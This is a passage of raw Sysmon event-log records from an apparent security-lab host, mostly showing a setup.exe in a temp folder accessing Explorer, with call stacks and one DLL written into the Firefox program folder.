|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-utility-l1-1-0.dll2021-01-18 13:59:52.239 10341000x800000000000000014585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 